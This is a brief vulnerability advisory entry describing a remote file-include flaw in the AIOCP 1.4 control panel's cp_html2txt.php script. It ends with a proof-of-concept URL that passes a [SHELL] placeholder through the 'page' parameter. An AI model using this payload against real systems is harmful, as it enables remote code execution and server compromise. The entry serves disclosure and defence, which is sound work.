AIOCP 1.4 'cp_html2txt.php' Remote File Include Vulnerability

2014-07-01T00:00:00
ID SSV:86362
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/35811/info

AIOCP (All In One Control Panel) is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting this issue may allow an attacker to compromise the application and the computer; other attacks are also possible.

AIOCP 1.4.001 is vulnerable; other versions may also be affected.

http://www.example.com/public/code/cp_html2txt.php?page=[SHELL]